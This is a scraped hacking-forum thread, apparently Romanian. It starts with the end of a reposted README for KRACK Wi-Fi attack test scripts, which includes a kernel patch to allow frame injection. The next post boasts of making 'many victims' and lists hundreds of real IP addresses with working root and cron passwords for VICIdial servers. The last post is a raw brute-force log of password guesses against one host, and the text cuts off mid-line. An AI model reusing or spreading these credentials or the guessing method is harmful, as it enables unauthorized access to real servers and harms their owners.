Example output of patched AP (note that IVs are never reused): [16:00:49] Replaying Reassociation Request [16:00:49] AP transmitted data using IV=1 (seq=0) [16:00:50] AP transmitted data using IV=2 (seq=1) [16:00:50] Replaying Reassociation Request [16:00:51] AP transmitted data using IV=3 (seq=2) [16:00:51] Replaying Reassociation Request [16:00:52] AP transmitted data using IV=4 (seq=3) Extra: Hardware Decryption To confirm that hardware decryption is disable, execute systool -vm ath9k_htc or similar after plugging in your Wi-Fi NIC to confirm the nohwcript/swcrypto/hwcrypto parameter has been set. Note that you must replace ath9k_htc with the kernel module for your wireless network card. Extra: 5 GHz not supported There's no official support for testing devices in the 5 GHz band. If you nevertheless want to use the tool on 5 GHz channels, the network card being used must allow the injection of frames in the 5 GHz channel. Unfortunately, this is not always possible due to regulatory constraints. To see on which channels you can inject frames you can execute iw list and look under Frequencies for channels that are not marked as disabled, no IR, or radar detection. Note that these conditions may depend on your network card, the current configured country, and the AP you are connected to. For more information see, for example, the Arch Linux documentation. Note that the Linux kernel may not allow the injection of frames even though it is allowed to send normal frames. This is because in the function ieee80211_monitor_start_xmit the kernel refuses to inject frames when cfg80211_reg_can_beacon returns false. As a result, Linux may refuse to inject frames even though this is actually allowed. Making cfg80211_reg_can_beacon return true under the correct (or all) conditions prevents this bug. So you'll have to patch the Linux drivers so that cfg80211_reg_can_beacon always returns true, for instance, by manually patching the packport driver code. Extra: Manual Tests It's also possible to manually perform (more detailed) tests by cloning the hostap git repository: git clone git://w1.fi/srv/git/hostap.git And following the instructions in tests/cipher-and-key-mgmt-testing.txt. Sursa: https://github.com/vanhoefm/krackattacks-scripts
  22. am sa fac multe victime cu post`u asta rooturi , testati doar ->>> extensions-vicidial.conf OK:14.102.109.179:cron:test OK:14.102.105.178:cron:test OK:14.192.148.114:cron:test OK:24.233.183.185:cron:test OK:27.251.17.163:cron:test OK:38.102.66.145:cron:test OK:41.174.67.199:cron:test OK:49.248.98.231:root:vicidialnow OK:49.248.98.231:cron:test OK:59.160.209.66:root:vicidialnow OK:59.165.44.21:root:vicidialnow OK:59.160.209.66:cron:test OK:59.162.182.242:cron:test OK:59.162.178.235:cron:test OK:59.162.178.230:cron:test OK:59.162.178.74:cron:test OK:59.162.181.28:cron:test OK:59.162.178.115:cron:test OK:59.160.209.235:cron:test OK:59.160.209.43:cron:test OK:59.162.178.123:cron:test OK:59.162.178.114:cron:test OK:59.162.182.220:cron:test OK:59.160.209.45:cron:test OK:59.160.209.42:cron:test OK:61.16.162.150:cron:test OK:61.8.158.150:cron:test OK:64.27.54.162:cron:test OK:64.27.24.248:cron:test OK:64.79.97.231:cron:test OK:64.150.180.220:cron:test OK:65.110.21.234:cron:test OK:67.215.225.224:cron:test OK:68.68.29.191:cron:test OK:68.68.29.195:cron:test OK:68.68.29.179:cron:test OK:68.68.29.193:cron:test OK:68.68.29.177:cron:test OK:68.68.29.176:cron:test OK:68.68.29.196:cron:test OK:68.68.29.197:cron:test OK:68.68.29.199:cron:test OK:68.68.29.194:cron:test OK:68.68.29.198:cron:test OK:68.68.29.200:cron:test OK:68.68.29.178:cron:test OK:68.68.29.180:cron:test OK:68.68.29.192:cron:test OK:69.195.157.170:cron:test OK:70.28.5.37:cron:test OK:71.249.238.83:root:vicidialnow OK:71.160.165.15:cron:test OK:71.249.238.83:cron:test OK:72.44.240.113:cron:test OK:72.44.240.111:cron:test OK:72.44.240.110:cron:test OK:74.122.128.121:cron:test OK:74.214.2.67:cron:test OK:75.112.151.27:cron:test OK:78.46.75.107:cron:test OK:91.186.227.226:root:vicidialnow OK:91.186.227.224:root:vicidialnow OK:91.186.228.167:root:vicidialnow OK:91.186.228.86:root:vicidialnow OK:91.186.228.197:root:vicidialnow OK:91.186.228.231:root:vicidialnow OK:91.186.228.90:root:vicidialnow OK:91.186.230.231:root:vicidialnow OK:91.186.231.51:root:vicidialnow OK:91.186.231.93:root:vicidialnow OK:91.186.229.40:root:vicidialnow OK:91.186.230.226:root:vicidialnow OK:91.186.231.97:root:vicidialnow OK:91.186.232.172:root:vicidialnow OK:91.186.232.57:root:vicidialnow OK:91.186.233.11:root:vicidialnow OK:91.186.233.79:root:vicidialnow OK:91.186.233.140:root:vicidialnow OK:91.186.233.195:root:vicidialnow OK:91.186.234.46:root:vicidialnow OK:91.186.233.208:root:vicidialnow OK:91.186.234.115:root:vicidialnow OK:91.186.233.143:root:vicidialnow OK:91.186.234.201:root:vicidialnow OK:91.186.236.168:root:vicidialnow OK:91.186.236.164:root:vicidialnow OK:91.186.236.169:root:vicidialnow OK:91.186.238.110:root:vicidialnow OK:91.186.238.204:root:vicidialnow OK:91.186.238.100:root:vicidialnow OK:91.186.239.57:root:vicidialnow OK:91.186.239.103:root:vicidialnow OK:91.186.239.105:root:vicidialnow OK:91.186.239.172:root:vicidialnow OK:91.186.239.45:root:vicidialnow OK:91.186.239.52:root:vicidialnow OK:91.186.240.15:root:vicidialnow OK:91.186.240.129:root:vicidialnow OK:91.186.240.213:root:vicidialnow OK:91.186.240.180:root:vicidialnow OK:91.186.241.66:root:vicidialnow OK:91.186.241.22:root:vicidialnow OK:91.186.241.12:root:vicidialnow OK:91.186.241.9:root:vicidialnow OK:91.186.240.164:root:vicidialnow OK:91.186.241.180:root:vicidialnow OK:91.186.241.192:root:vicidialnow OK:91.186.241.238:root:vicidialnow OK:91.186.241.140:root:vicidialnow OK:91.186.242.54:root:vicidialnow OK:91.186.242.81:root:vicidialnow OK:91.186.242.215:root:vicidialnow OK:91.186.242.163:root:vicidialnow OK:91.186.243.22:root:vicidialnow OK:91.186.243.66:root:vicidialnow OK:91.186.243.224:root:vicidialnow OK:91.186.243.135:root:vicidialnow OK:91.186.243.193:root:vicidialnow OK:91.186.244.65:root:vicidialnow OK:91.186.244.225:root:vicidialnow OK:91.186.245.133:root:vicidialnow OK:91.186.245.170:root:vicidialnow OK:91.186.246.32:root:vicidialnow OK:91.186.246.236:root:vicidialnow OK:91.186.246.210:root:vicidialnow OK:91.186.247.27:root:vicidialnow OK:91.186.246.204:root:vicidialnow OK:91.186.244.96:root:vicidialnow OK:91.186.247.34:root:vicidialnow OK:91.186.247.117:root:vicidialnow OK:91.186.247.140:root:vicidialnow OK:91.186.247.90:root:vicidialnow OK:91.186.247.216:root:vicidialnow OK:91.186.246.163:root:vicidialnow OK:91.186.248.172:root:vicidialnow OK:91.186.251.74:root:vicidialnow OK:91.186.251.115:root:vicidialnow OK:91.186.251.65:root:vicidialnow OK:91.186.252.129:root:vicidialnow OK:91.186.252.206:root:vicidialnow OK:91.186.253.84:root:vicidialnow OK:91.186.253.78:root:vicidialnow OK:91.186.254.60:root:vicidialnow OK:91.186.254.7:root:vicidialnow OK:91.186.254.97:root:vicidialnow OK:91.186.254.136:root:vicidialnow OK:91.186.254.137:root:vicidialnow OK:91.186.254.175:root:vicidialnow OK:91.186.254.177:root:vicidialnow OK:91.186.254.225:root:vicidialnow OK:91.186.254.193:root:vicidialnow OK:91.186.254.226:root:vicidialnow OK:91.186.254.179:root:vicidialnow OK:91.186.255.86:root:vicidialnow OK:91.186.255.186:root:vicidialnow OK:91.186.255.113:root:vicidialnow OK:91.186.255.180:root:vicidialnow OK:91.186.255.134:root:vicidialnow OK:91.186.255.192:root:vicidialnow OK:91.186.255.38:root:vicidialnow OK:91.186.255.236:root:vicidialnow OK:91.186.227.226:cron:test OK:91.186.227.224:cron:test OK:91.186.228.86:cron:test OK:91.186.228.167:cron:test OK:91.186.228.90:cron:test OK:91.186.228.231:cron:test OK:91.186.230.226:cron:test OK:91.186.230.231:cron:test OK:91.186.231.51:cron:test OK:91.186.229.40:cron:test OK:91.186.231.93:cron:test OK:91.186.231.97:cron:test OK:91.186.232.57:cron:test OK:91.186.232.172:cron:test OK:91.186.233.11:cron:test OK:91.186.233.79:cron:test OK:91.186.233.208:cron:test OK:91.186.233.140:cron:test OK:91.186.233.195:cron:test OK:91.186.234.46:cron:test OK:91.186.234.115:cron:test OK:91.186.234.201:cron:test OK:91.186.236.169:cron:test OK:91.186.233.143:cron:test OK:91.186.236.164:cron:test OK:91.186.236.168:cron:test OK:91.186.238.110:cron:test OK:91.186.238.100:cron:test OK:91.186.238.204:cron:test OK:91.186.239.52:cron:test OK:91.186.239.45:cron:test OK:91.186.239.57:cron:test OK:91.186.239.103:cron:test OK:91.186.239.172:cron:test OK:91.186.239.105:cron:test OK:91.186.240.15:cron:test OK:91.186.240.180:cron:test OK:91.186.240.213:cron:test OK:91.186.241.22:cron:test OK:91.186.241.12:cron:test OK:91.186.241.9:cron:test OK:91.186.241.66:cron:test OK:91.186.241.180:cron:test OK:91.186.240.164:cron:test OK:91.186.241.140:cron:test OK:91.186.241.192:cron:test OK:91.186.241.238:cron:test OK:91.186.242.54:cron:test OK:91.186.242.81:cron:test OK:91.186.242.215:cron:test OK:91.186.243.22:cron:test OK:91.186.242.163:cron:test OK:91.186.243.66:cron:test OK:91.186.243.135:cron:test OK:91.186.243.224:cron:test OK:91.186.243.193:cron:test OK:91.186.244.65:cron:test OK:91.186.244.96:cron:test OK:91.186.244.225:cron:test OK:91.186.245.170:cron:test OK:91.186.245.133:cron:test OK:91.186.246.32:cron:test OK:91.186.246.210:cron:test OK:91.186.244.222:cron:test OK:91.186.246.236:cron:test OK:91.186.247.27:cron:test OK:91.186.246.204:cron:test OK:91.186.247.90:cron:test OK:91.186.247.117:cron:test OK:91.186.247.140:cron:test OK:91.186.247.216:cron:test OK:91.186.246.163:cron:test OK:91.186.247.34:cron:test OK:91.186.251.65:cron:test OK:91.186.251.74:cron:test OK:91.186.251.115:cron:test OK:91.186.248.172:cron:test OK:91.186.252.129:cron:test OK:91.186.252.206:cron:test OK:91.186.253.78:cron:test OK:91.186.253.84:cron:test OK:91.186.254.7:cron:test OK:91.186.254.97:cron:test OK:91.186.254.60:cron:test OK:91.186.254.136:cron:test OK:91.186.254.137:cron:test OK:91.186.254.193:cron:test OK:91.186.254.177:cron:test OK:91.186.254.179:cron:test OK:91.186.254.226:cron:test OK:91.186.255.38:cron:test OK:91.186.254.225:cron:test OK:91.186.254.175:cron:test OK:91.186.255.113:cron:test OK:91.186.255.86:cron:test OK:91.186.255.134:cron:test OK:91.186.255.236:cron:test OK:91.186.255.180:cron:test OK:91.186.255.186:cron:test OK:91.186.255.192:cron:test OK:93.89.80.147:cron:test OK:98.112.44.114:cron:test OK:99.42.199.250:cron:test OK:110.172.53.146:cron:test OK:110.172.54.91:cron:test OK:110.172.52.162:cron:test OK:110.234.103.234:cron:test OK:111.93.161.162:cron:test OK:114.143.209.178:root:vicidialnow OK:114.143.184.11:cron:test OK:114.143.123.63:cron:test OK:114.143.61.194:cron:test OK:114.130.37.29:cron:test OK:114.143.209.178:cron:test OK:115.119.203.4:root:vicidialnow OK:115.119.138.230:root:vicidialnow OK:115.117.19.11:root:vicidialnow OK:115.186.94.162:root:vicidialnow OK:115.249.3.133:root:vicidialnow OK:115.117.19.22:cron:test OK:115.119.203.4:cron:test OK:115.119.138.230:cron:test OK:115.117.19.20:cron:test OK:115.111.84.99:cron:test OK:115.117.19.21:cron:test OK:115.111.84.99:cron:test OK:115.119.75.236:cron:test OK:115.117.19.6:cron:test OK:115.117.19.11:cron:test OK:115.178.96.182:cron:test OK:115.186.94.162:cron:test OK:115.249.144.98:cron:test OK:115.248.216.186:cron:test OK:115.249.3.133:cron:test OK:117.102.9.187:cron:test OK:117.239.73.161:cron:test OK:119.92.225.131:root:vicidialnow OK:119.82.121.55:cron:test OK:119.92.225.131:cron:test OK:119.226.54.158:cron:test OK:122.102.24.177:root:vicidialnow OK:122.176.82.226:root:vicidialnow OK:122.52.254.126:cron:test OK:122.55.55.204:cron:test OK:122.102.24.177:cron:test OK:122.54.251.37:cron:test OK:122.176.82.226:cron:test OK:122.169.246.34:cron:test OK:122.169.252.161:cron:test OK:125.19.102.50:cron:test OK:125.212.38.13:cron:test OK:122.102.24.177:root:vicidialnow OK:122.176.82.226:root:vicidialnow OK:122.52.254.126:cron:test OK:122.55.55.204:cron:test OK:122.102.24.177:cron:test OK:122.54.251.37:cron:test OK:122.176.82.226:cron:test OK:122.169.246.34:cron:test OK:122.169.252.161:cron:test OK:125.19.102.50:cron:test OK:125.212.38.13:cron:test OK:161.246.45.247:root:vicidialnow OK:161.246.45.246:cron:test OK:178.238.179.172:root:vicidialnow OK:178.238.179.155:root:vicidialnow OK:178.238.179.209:root:vicidialnow OK:178.238.179.169:root:vicidialnow OK:178.238.180.12:root:vicidialnow OK:178.238.180.32:root:vicidialnow OK:178.238.180.30:root:vicidialnow OK:178.238.180.79:root:vicidialnow OK:178.238.180.124:root:vicidialnow OK:178.238.180.110:root:vicidialnow OK:178.238.180.53:root:vicidialnow OK:178.238.180.111:root:vicidialnow OK:178.238.180.167:root:vicidialnow OK:178.238.180.151:root:vicidialnow OK:178.238.180.95:root:vicidialnow OK:178.238.180.131:root:vicidialnow OK:178.238.180.152:root:vicidialnow OK:178.238.180.228:root:vicidialnow OK:178.238.180.218:root:vicidialnow OK:178.238.180.241:root:vicidialnow OK:178.238.179.172:cron:test OK:178.238.179.155:cron:test OK:178.238.179.209:cron:test OK:178.238.179.169:cron:test OK:178.238.180.30:cron:test OK:178.238.180.32:cron:test OK:178.238.180.12:cron:test OK:178.238.180.110:cron:test OK:178.238.180.53:cron:test OK:178.238.180.95:cron:test OK:178.238.180.79:cron:test OK:178.238.180.131:cron:test OK:178.238.180.124:cron:test OK:178.238.180.111:cron:test OK:178.238.180.167:cron:test OK:178.238.180.151:cron:test OK:178.238.180.198:cron:test OK:178.238.180.228:cron:test OK:178.238.180.241:cron:test OK:178.238.180.218:cron:test OK:178.238.180.152:cron:test OK:182.71.36.9:cron:test OK:182.72.131.34:cron:test OK:190.0.39.34:root:vicidialnow OK:190.6.144.131:cron:test OK:190.181.26.126:cron:test OK:190.181.129.130:cron:test OK:195.24.211.203:root:vicidialnow OK:196.210.219.89:cron:test OK:200.42.220.234:root:vicidialnow OK:200.42.220.234:cron:test OK:202.65.148.126:cron:test OK:202.41.204.171:cron:test OK:202.78.165.66:cron:test OK:202.124.151.30:cron:test OK:202.142.127.10:cron:test OK:202.138.169.230:cron:test OK:202.138.172.74:cron:test OK:203.171.240.108:root:vicidialnow OK:203.177.140.157:root:vicidialnow OK:203.122.14.86:cron:test OK:203.122.19.50:cron:test OK:203.171.240.108:cron:test OK:203.177.84.67:cron:test OK:203.177.140.158:cron:test OK:203.177.140.157:cron:test OK:203.200.160.178:cron:test OK:203.200.160.45:cron:test OK:204.9.243.190:cron:test OK:207.204.86.125:cron:test
  23. patrick patrick 192.16.196.70 | no host root patrick 192.16.196.70 | no host root Dallas 192.16.196.70 | no host Jessica Jessica 192.16.196.70 | no host root Jessica 192.16.196.70 | no host root Nicole 192.16.196.70 | no host root Sendit 192.16.196.70 | no host root Smokey 192.16.196.70 | no host Nicole Nicole 192.16.196.70 | no host Sendit Sendit 192.16.196.70 | no host admin Smokey 192.16.196.70 | no host admin baseball 192.16.196.70 | no host daniel daniel 192.16.196.70 | no host diamon diamond 192.16.196.70 | no host joshua joshua 192.16.196.70 | no host michelle michelle 192.16.196.70 | no host mike mike 192.16.196.70 | no host silver silver 192.16.196.70 | no host oracle 1q2w3e 192.16.196.70 | no host oracleFriends George 192.16.196.70 | no host George Shadow 192.16.196.70 | no host Shadow Summer 192.16.196.70 | no host Summer oracle 192.16.196.70 | no host bandit oracle 192.16.196.70 | no host coffee oracle 192.16.196.70 | no host falcon oracle 192.16.196.70 | no host fuckyou oracle 192.16.196.70 | no host pepper richard 192.16.196.70 | no host richard thomas 192.16.196.70 | no host thomas undead 192.16.196.70 | no host undead oracle 192.16.196.70 | no host !@#$% AndrewAndrew 192.16.196.70 | no host Buster Buster 192.16.196.70 | no host oracle Cowboy 192.16.196.70 | no host oracle Eagles 192.16.196.70 | no host oracle Elwood 192.16.196.70 | no host oracle Master 192.16.196.70 | no host oracle Nathan 192.16.196.70 | no host oracle changeme 192.16.196.70 | no host charlie charlie 192.16.196.70 | no host golf golf 192.16.196.70 | no host green green 192.16.196.70 | no host oracle linda 192.16.196.70 | no host oracle merlin 192.16.196.70 | no host oracle monkey 192.16.196.70 | no host oracle nite 192.16.196.70 | no host oracle secret 192.16.196.70 | no host oracle soccer 192.16.196.70 | no host oracle steve 192.16.196.70 | no host oracle 1234567 192.16.196.70 | no host oracle Apples 192.16.196.70 | no host oracle Dragon 192.16.196.70 | no host oracle Flower 192.16.196.70 | no host oracle Mustang 192.16.196.70 | no host oracle Pepper 192.16.196.70 | no host oracle george 192.16.196.70 | no host oracle guest 192.16.196.70 | no host oracle hockey 192.16.196.70 | no host oracle james 192.16.196.70 | no host oracle koko 192.16.196.70 | no host oracle matthew 192.16.196.70 | no host oracle pookie 192.16.196.70 | no host oracle robert 192.16.196.70 | no host oracle xxx 192.16.196.70 | no host oracle Dolphin 192.16.196.70 | no host oracle Killer 192.16.196.70 | no host oracle Miller 192.16.196.70 | no host oracle Packers 192.16.196.70 | no host oracle Tigger 192.16.196.70 | no host oracle alex 192.16.196.70 | no host oracle canada 192.16.196.70 | no host oracle john 192.16.196.70 | no host oracle master 192.16.196.70 | no host oracle Chicago 192.16.196.70 | no host oracle Kitten 192.16.196.70 | no host oracle Polaris 192.16.196.70 | no host oracle Spanky 192.16.196.70 | no host oracle Tennis 192.16.196.70 | no host oracle Thomas 192.16.196.70 | no host oracle Tweety 192.16.196.70 | no host oracle hammer 192.16.196.70 | no host oracle letmein 192.16.196.70 | no host oracle magic 192.16.196.70 | no host oracle murphy 192.16.196.70 | no host oracle scooter 192.16.196.70 | no host oracle service 192.16.196.70 | no host oracle snoopy 192.16.196.70 | no host oracle sophie 192.16.196.70 | no host oracle thx1138 192.16.196.70 | no host oracle tiger 192.16.196.70 | no host oracle Ashley 192.16.196.70 | no host oracle Basket 192.16.196.70 | no host oracle Ginger 192.16.196.70 | no host oracle Nirvana 192.16.196.70 | no host oracle Teacher 192.16.196.70 | no host oracle Yellow 192.16.196.70 | no host oracle blue 192.16.196.70 | no host oracle dave 192.16.196.70 | no host oracle hunter 192.16.196.70 | no host oracle sarah 192.16.196.70 | no host oracle thursday 192.16.196.70 | no host oracle welcome 192.16.196.70 | no host oracle Bandit 192.16.196.70 | no host oracle Volley 192.16.196.70 | no host oracle aaaaaa 192.16.196.70 | no host oracle ashley 192.16.196.70 | no host oracle bear 192.16.196.70 | no host oracle boomer 192.16.196.70 | no host oracle calvin 192.16.196.70 | no host oracle dallas 192.16.196.70 | no host oracle friday 192.16.196.70 | no host oracle happy 192.16.196.70 | no host oracle jason 192.16.196.70 | no host oracle madison 192.16.196.70 | no host oracle martin 192.16.196.70 | no host oracle mother 192.16.196.70 | no host oracle nicole 192.16.196.70 | no host oracle purple 192.16.196.70 | no host oracle ranger 192.16.196.70 | no host oracle 123go 192.16.196.70 | no host oracle Airhead 192.16.196.70 | no host oracle Braves 192.16.196.70 | no host oracle Sparky 192.16.196.70 | no host oracle angela 192.16.196.70 | no host oracle brandy 192.16.196.70 | no host oracle cindy 192.16.196.70 | no host oracle dakota 192.16.196.70 | no host oracle donald 192.16.196.70 | no host oracle football 192.16.196.70 | no host oracle ncc1701 192.16.196.70 | no host oracle shannon 192.16.196.70 | no host oracle soleil 192.16.196.70 | no host oracle taylor 192.16.196.70 | no host oracle tuesday 192.16.196.70 | no host oracle Abcdef 192.16.196.70 | no host oracle August 192.16.196.70 | no host oracle Footbal 192.16.196.70 | no host oracle Heather 192.16.196.70 | no host oracle Johnson 192.16.196.70 | no host oracle Maggie 192.16.196.70 | no host oracle Matthew 192.16.196.70 | no host oracle Michelle 192.16.196.70 | no host oracle Monday 192.16.196.70 | no host oracle Pookie 192.16.196.70 | no host oracle Rabbit 192.16.196.70 | no host oracle Richard 192.16.196.70 | no host oracle Smiley 192.16.196.70 | no host oracle amanda 192.16.196.70 | no host oracle anthony 192.16.196.70 | no host oracle camaro 192.16.196.70 | no host oracle carmen 192.16.196.70 | no host oracle cowboy 192.16.196.70 | no host oracle genesis 192.16.196.70 | no host oracle jesus 192.16.196.70 | no host oracle joseph 192.16.196.70 | no host oracle justin 192.16.196.70 | no host oracle miller 192.16.196.70 | no host oracle ncc1701d 192.16.196.70 | no host oracle pamela 192.16.196.70 | no host oracle picture 192.16.196.70 | no host oracle princess 192.16.196.70 | no host oracle rabbit 192.16.196.70 | no host oracle rocket 192.16.196.70 | no host oracle sierra 192.16.196.70 | no host oracle steven 192.16.196.70 | no host oracle success 192.16.196.70 | no host oracle tennis 192.16.196.70 | no host oracle victoria 192.16.196.70 | no host oracle willow 192.16.196.70 | no host oracle Abcdefg 192.16.196.70 | no host oracle Bubba 192.16.196.70 | no host oracle Charlie 192.16.196.70 | no host oracle Compute 192.16.196.70 | no host oracle Computer 192.16.196.70 | no host oracle Fuckyou 192.16.196.70 | no host oracle Hammer 192.16.196.70 | no host oracle Jeremy 192.16.196.70 | no host oracle Library 192.16.196.70 | no host oracle Password 192.16.196.70 | no host oracle Runner 192.16.196.70 | no host oracle Scooter 192.16.196.70 | no host oracle Shorty 192.16.196.70 | no host oracle Silver 192.16.196.70 | no host oracle Taylor 192.16.196.70 | no host oracle Tigers 192.16.196.70 | no host oracle Travis 192.16.196.70 | no host oracle Viper 192.16.196.70 | no host oracle digital 192.16.196.70 | no host oracle duke 192.16.196.70 | no host oracle freedom 192.16.196.70 | no host oracle gandalf 192.16.196.70 | no host oracle ginger 192.16.196.70 | no host oracle heather 192.16.196.70 | no host oracle loveyou 192.16.196.70 | no host oracle jessica 192.16.196.70 | no host oracle killer 192.16.196.70 | no host oracle lizard 192.16.196.70 | no host oracle loser 192.16.196.70 | no host oracle mark 192.16.196.70 | no host oracle monica 192.16.196.70 | no host oracle oscar 192.16.196.70 | no host oracle peanut 192.16.196.70 | no host oracle pentium 192.16.196.70 | no host oracle peter 192.16.196.70 | no host oracle phoenix 192.16.196.70 | no host oracle piglet 192.16.196.70 | no host rainbow oracle 192.16.196.70 | no host runner oracle 192.16.196.70 | no host sam oracle 192.16.196.70 | no host saturn oracle 192.16.196.70 | no host scott oracle 192.16.196.70 | no host skippy oracle 192.16.196.70 | no host startrek oracle 192.16.196.70 | no host temp oracle 192.16.196.70 | no host 111111 oracle 192.16.196.70 | no host 123123 oracle 192.16.196.70 | no host 2welcome oracle 192.16.196.70 | no host Basebal oracle 192.16.196.70 | no host Batman oracle 192.16.196.70 | no host Brandy root 192.16.196.70 | no host Cassie root 192.16.196.70 | no host Dustin root 192.16.196.70 | no host Fishing root 192.16.196.70 | no host Harley root 192.16.196.70 | no host Hunter root 192.16.196.70 | no host Orlando root 192.16.196.70 | no host Peaches root 192.16.196.70 | no host Scotty root 192.16.196.70 | no host Steven root 192.16.196.70 | no host Voyager root 192.16.196.70 | no host andrea root 192.16.196.70 | no host ass root 192.16.196.70 | no host avalon root 192.16.196.70 | no host batman root 192.16.196.70 | no host brandon root 192.16.196.70 | no host bubba root 192.16.196.70 | no host casey root 192.16.196.70 | no host eagle root 192.16.196.70 | no host frog1 root 192.16.196.70 | no host fuckme root 192.16.196.70 | no host info root 192.16.196.70 | no host love root 192.16.196.70 | no host marie root 192.16.196.70 | no host misty root 192.16.196.70 | no host natasha root 192.16.196.70 | no host newyork root 192.16.196.70 | no host nss root 192.16.196.70 | no host poohbear root 192.16.196.70 | no host rachel root 192.16.196.70 | no host turtle root 192.16.196.70 | no host walter root 192.16.196.70 | no host wizard root 192.16.196.70 | no host 00000000 root 192.16.196.70 | no host Daniel root 192.16.196.70 | no host Friday root 192.16.196.70 | no host Hornets root 192.16.196.70 | no host Joshua root 192.16.196.70 | no host Online root 192.16.196.70 | no host Rodman root 192.16.196.70 | no host Science root 192.16.196.70 | no host andy root 192.16.196.70 | no host asdf root 192.16.196.70 | no host august root 192.16.196.70 | no host austin root 192.16.196.70 | no host beavis root 192.16.196.70 | no host brenda root 192.16.196.70 | no host brian root 192.16.196.70 | no host butthead root 192.16.196.70 | no host charles root 192.16.196.70 | no host cheese root 192.16.196.70 | no host doctor root 192.16.196.70 | no host dolphin root 192.16.196.70 | no host flower root 192.16.196.70 | no host jonathan root 192.16.196.70 | no host junior root 192.16.196.70 | no host knight root 192.16.196.70 | no host marley root 192.16.196.70 | no host maverick root 192.16.196.70 | no host molson root 192.16.196.70 | no host morgan root 192.16.196.70 | no host mouse root 192.16.196.70 | no host nathan root 192.16.196.70 | no host nissan root 192.16.196.70 | no host rebecca root 192.16.196.70 | no host shalom root 192.16.196.70 | no host smile root 192.16.196.70 | no host sparky root 192.16.196.70 | no host stephen root 192.16.196.70 | no host whatever root 192.16.196.70 | no host william root 192.16.196.70 | no host 696969 root 192.16.196.70 | no host Anthony root 192.16.196.70 | no host Casper root 192.16.196.70 | no host Helpme root 192.16.196.70 | no host Jessie root 192.16.196.70 | no host Mother root 192.16.196.70 | no host Pebbles root 192.16.196.70 | no host Pentium root 192.16.196.70 | no host Secret root 192.16.196.70 | no host Sonics root 192.16.196.70 | no host Viking root 192.16.196.70 | no host Wolves root 192.16.196.70 | no host access root 192.16.196.70 | no host alpha root 192.16.196.70 | no host angel root 192.16.196.70 | no host ath root 192.16.196.70 | no host banane root 192.16.196.70 | no host bob root 192.16.196.70 | no host bond007 root 192.16.196.70 | no host booger root 192.16.196.70 | no host boris root 192.16.196.70 | no host chicken root 192.16.196.70 | no host cookie root 192.16.196.70 | no host elephant root 192.16.196.70 | no host elvis root 192.16.196.70 | no host emily root 192.16.196.70 | no host eric root 192.16.196.70 | no host france root 192.16.196.70 | no host gizmo root 192.16.196.70 | no host goober root 192.16.196.70 | no host horses root 192.16.196.70 | no host island root 192.16.196.70 | no host jeffrey root 192.16.196.70 | no host jerry root 192.16.196.70 | no host joe root 192.16.196.70 | no host jupiter root 192.16.196.70 | no host justice root 192.16.196.70 | no host lisa lroot 192.16.196.70 | no host ucky mindy 192.16.196.70 | no host root missy 192.16.196.70 | no host root muffin 192.16.196.70 | no host root music 192.16.196.70 | no host root protel 192.16.196.70 | no host root rose 192.16.196.70 | no host root sandy 192.16.196.70 | no host root sharon 192.16.196.70 | no host root snake 192.16.196.70 | no host root spider 192.16.196.70 | no host root spring 192.16.196.70 | no host root test1 192.16.196.70 | no host root tommy 192.16.196.70 | no host root toyota 192.16.196.70 | no host root vincent 192.16.196.70 | no host root wqsb 192.16.196.70 | no host root 7777 192.16.196.70 | no host root 8675309 192.16.196.70 | no host root Barney 192.16.196.70 | no host root Bowling 192.16.196.70 | no host root Camaro 192.16.196.70 | no host root Casio 192.16.196.70 | no host root Cookie 192.16.196.70 | no host root Froggy 192.16.196.70 | no host root Golfer 192.16.196.70 | no host root Junior 192.16.196.70 | no host root Knights 192.16.196.70 | no host root Lakers 192.16.196.70 | no host root Melissa 192.16.196.70 | no host root Patrick 192.16.196.70 | no host root Rachel 192.16.196.70 | no host test Raiders 192.16.196.70 | no host test Reggie 192.16.196.70 | no host test Shelly 192.16.196.70 | no host test Shithead 192.16.196.70 | no host test Speedy 192.16.196.70 | no host test Thunder 192.16.196.70 | no host test Windows 192.16.196.70 | no host test albert 192.16.196.70 | no host test alexande 192.16.196.70 | no host test america7 192.16.196.70 | no host test banana 192.16.196.70 | no host test barbara 192.16.196.70 | no host test barney 192.16.196.70 | no host test billy 192.16.196.70 | no host test biteme 192.16.196.70 | no host test black 192.16.196.70 | no host test chelsea 192.16.196.70 | no host test claire 192.16.196.70 | no host test connie 192.16.196.70 | no host test debbie 192.16.196.70 | no host test delta 192.16.196.70 | no host test dennis 192.16.196.70 | no host test eeyore 192.16.196.70 | no host test fishing 192.16.196.70 | no host test fucker 192.16.196.70 | no host test helpme 192.16.196.70 | no host test honda 192.16.196.70 | no host test indiana 192.16.196.70 | no host test jackson 192.16.196.70 | no host test jasmine 192.16.196.70 | no host test karen 192.16.196.70 | no host test kevin 192.16.196.70 | no host test lestat 192.16.196.70 | no host test logan 192.16.196.70 | no host test louis 192.16.196.70 | no host test louise 192.16.196.70 | no host test micro 192.16.196.70 | no host test mitchell 192.16.196.70 | no host test nirvana 192.16.196.70 | no host test none 192.16.196.70 | no host test paul 192.16.196.70 | no host test pepsi 192.16.196.70 | no host test perry 192.16.196.70 | no host test phantom 192.16.196.70 | no host duck duck 192.16.196.70 | no host dusty dusty 192.16.196.70 | no host eagle1 eagle1 192.16.196.70 | no host enigma enigma 192.16.196.70 | no host francis francis 192.16.196.70 | no host francois francois 192.16.196.70 | no host franklin franklin 192.16.196.70 | no host froggy froggy 192.16.196.70 | no host gabriel gabriel 192.16.196.70 | no host ghost ghost 192.16.196.70 | no host gopher gopher 192.16.196.70 | no host grover grover 192.16.196.70 | no host happy1 happy1 192.16.196.70 | no host helen helen 192.16.196.70 | no host henry henry 192.16.196.70 | no host honey honey 192.16.196.70 | no host horse horse 192.16.196.70 | no host house house 192.16.196.70 | no host jackiejackie jean 192.16.196.70 | no host jean jenny 192.16.196.70 | no host jenny joey 192.16.196.70 | no host joey Asdfgh 192.16.196.70 | no host Asdfgh Asshole 192.16.196.70 | no host Asshole Awesome 192.16.196.70 | no host Awesome Biology 192.16.196.70 | no host Biology Bond007 192.16.196.70 | no host Bond007 Booboo 192.16.196.70 | no host Booboo Bradley 192.16.196.70 | no host Bradley Buffalo 192.16.196.70 | no host Buffalo Calvin 192.16.196.70 | no host Calvin Canada 192.16.196.70 | no host Canada Celtics 192.16.196.70 | no host Celtics Chester 192.16.196.70 | no host Chester Colleen 192.16.196.70 | no host Colleen Connie 192.16.196.70 | no host Connie Cooper 192.16.196.70 | no host Cooper Cracker 192.16.196.70 | no host Cracker Disney 192.16.196.70 | no host Disne y 192.16.196.70 | no host Doobie Doobie 192.16.196.70 | no host Dream Dwight 192.16.196.70 | 